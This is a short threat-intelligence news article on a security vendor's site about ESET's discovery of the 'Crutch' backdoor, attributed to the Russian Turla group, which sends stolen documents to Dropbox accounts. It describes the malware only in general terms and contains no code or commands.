company logo

Product

Our Product

We are Reshaping the way Developers find and fix vulnerabilities before they get exploited.

Solutions

By Industry

BFSI

Healthcare

Education

IT & Telecom

Government

By Role

CISO

Application Security Engineer

DevsecOps Engineer

IT Manager

Resources

Resource Library

Get actionable insight straight from our threat Intel lab to keep you informed about the ever-changing Threat landscape.

Subscribe to Our Weekly Threat Digest

Company

Contact Us

Have queries, feedback or prospects? Get in touch and we shall be with you shortly.

loading..
loading..
loading..
Loading...

Malware

Russia

loading..
loading..
loading..

The Russian Malware ‘Crutch’ Used For Vulnerable Attacks Against Military Organizations

The Cyber Security firm Uncover Crutch Russian Malware Used In APT Attacks

04-Dec-2020
2 min read

Codenamed "Crutch" by ESET researchers, the suspicious software has been assigned to Turla (also known as Venomous Bear or Snake) which is a Russian-based advanced hacker group known for its severe attacks against governments, embassies and military groups through various watering hole and spear-phishing methods starting from the year 2015 till the early 2020.

The Cyber Security firm while doing an analysis shared that the tools were designed to withdraw sensitive documents and other files to Dropbox accounts controlled by Turla operators.

Besides identifying strong links between a Crutch sample from 2016 and Turla's yet another second-stage secret door known as Gazer, the latest suspicious software in their diverse toolset points to the group's continued focus on spying against high-designated targets.Crutch is delivered either through the Skipper suite, a first-stage implant previously attributed to Turla with two different versions of the suspicious software spotted before and after mid-2019.

While the former included a secret door that communicates with a hardcoded Dropbox account using the official HTTP API , and it was responsible for receiving commands and uploading the results, the newer variant ("Crutch v4") denies the setup for a new feature which can automatically upload the files found on local and removable drives to Dropbox by using the Windows Wget utility.

ESRT Researcher Matthieu Faou stated that the sophistication of the attacks and technical details of the discovery further strengthen the perception that the Turla group has sufficient resources to operate such a large and diverse arsenal.